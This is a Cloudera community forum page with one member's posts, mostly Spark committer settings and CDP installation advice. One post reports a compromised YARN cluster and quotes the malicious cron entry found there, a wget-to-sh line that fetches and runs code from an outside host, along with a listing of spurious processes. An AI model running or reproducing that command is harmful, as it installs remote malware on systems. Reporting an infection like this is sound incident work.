Member since
03-06-2020
114
Posts
3
Kudos Received
0
Solutions
07-26-2022
04:17 AM
1 Kudo
Hi Team, CDP uses the "org.apache.spark.internal.io.cloud.PathOutputCommitProtocol" OutputCommitter which does not support dynamicPartitionOverwrite. You can set the following parameters into your spark job. code level: spark.conf.set("spark.sql.sources.partitionOverwriteMode", "dynamic")
spark.conf.set("spark.sql.parquet.output.committer.class", "org.apache.parquet.hadoop.ParquetOutputCommitter")
spark.conf.set("spark.sql.sources.commitProtocolClass", "org.apache.spark.sql.execution.datasources.SQLHadoopMapReduceCommitProtocol") spark-submit/spark-shell: --conf spark.sql.sources.partitionOverwriteMode=dynamic --conf spark.sql.parquet.output.committer.class=org.apache.parquet.hadoop.ParquetOutputCommitter --conf spark.sql.sources.commitProtocolClass=org.apache.spark.sql.execution.datasources.SQLHadoopMapReduceCommitProtocol Note: If you are using S3, you can disable it by specifying spark.cloudera.s3_committers.enabled parameter. --conf spark.cloduera.s3_committers.enabled=false
... View more
03-08-2022
05:06 PM
In my case, the below cron entry was found $ sudo -u yarn crontab -l
*/10 * * * * wget http://vbyphnnymdjnsiau.3utilities.com/Bj2yso0 -O-|sh It resulted in so many spurious processes initiated by yarn - and shooting up the CPU. Nothing could be done. In some cases the number of entries were as high as 20k. $ ps -ef | grep yarn
yarn 30321 30318 0 11:44 ? 00:00:00 NHNe5C5iHr
yarn 30323 29152 0 11:44 ? 00:00:00 NHNe5C5iHr
yarn 30330 29075 0 11:44 ? 00:00:00 rxNqqqOesC1HqN
yarn 30427 30319 0 11:44 ? 00:00:00 NHNe5C5iHr
yarn 30773 1 0 10:34 ? 00:00:00 fexsOEvOv
yarn 31186 1 0 10:34 ? 00:00:00 GqOeeG5eCC1rO
yarn 31189 1 0 10:34 ? 00:00:00 ff1NrseqqffTHrve
yarn 31727 1 0 09:20 ? 00:00:00 ivxvj1Ei1
yarn 31731 31727 0 09:20 ? 00:00:04 ivxvj1Ei1
yarn 31770 1 0 09:20 ? 00:00:00 GjN1GxCsqE51fs
yarn 31771 31770 0 09:20 ? 00:00:21 GjN1GxCsqE51fs
yarn 31774 31770 0 09:20 ? 00:00:05 GjN1GxCsqE51fs
yarn 31790 1 0 09:20 ? 00:00:00 EvGeHe5OxfC
yarn 31791 31790 0 09:20 ? 00:00:23 EvGeHe5OxfC
yarn 31793 31790 0 09:20 ? 00:00:02 EvGeHe5OxfC
yarn 31803 1 0 09:20 ? 00:00:00 qCevqvvGff1
yarn 31804 31803 0 09:20 ? 00:00:18 qCevqvvGff1
yarn 31806 31803 0 09:20 ? 00:00:04 qCevqvvGff1
yarn 32243 1 0 10:35 ? 00:00:00 TNsNf5fqTEv5esOxx
yarn 32254 1 0 10:35 ? 00:00:00 qCevqvvGff1
yarn 32255 1 0 10:35 ? 00:00:00 seffjsOExr Thanks for discussing and bringing up this issue.
... View more
05-05-2021
06:09 AM
@klhinva The link provided by @ask_bill_brooks will show the current information. Here is an updated link directly to the Software Dependencies section. I hope this helps.
... View more
02-11-2021
01:04 AM
@Mondi Does that resolve you issue?
... View more
01-08-2021
07:37 AM
KT should be installed in it's own cluster. From a security standpoint, you don't want other services on the box.
... View more
01-06-2021
12:22 AM
@Mondi That should not be an issue. You can add some number of nodes. Check the CM server logs top see the issue.
... View more
01-04-2021
09:47 AM
@Mondi The simple answer is YES and the best source is the vendor itself Rack awareness CDP as computations are performed with the assistance of rack awareness scripts. Hope that helps Was your question answered? If so make sure to mark the answer as the accepted solution. If you find a reply useful, Kudos this answer by hitting the thumbs up button.
... View more
12-20-2020
06:24 AM
@Mondi you can follow below doc for reference. All you have to do is modify the db.properties file and point to the server which is having CM DB installed. https://docs.cloudera.com/documentation/enterprise/latest/topics/cm_ig_mysql.html#cmig_topic_5_5
... View more
10-20-2020
07:00 AM
You'll need to create local package an parcel repos. Docs here.. https://docs.cloudera.com/cdp-private-cloud-base/7.1.3/installation/topics/cdpdc-local-package-parcel-repositories.html Mike
... View more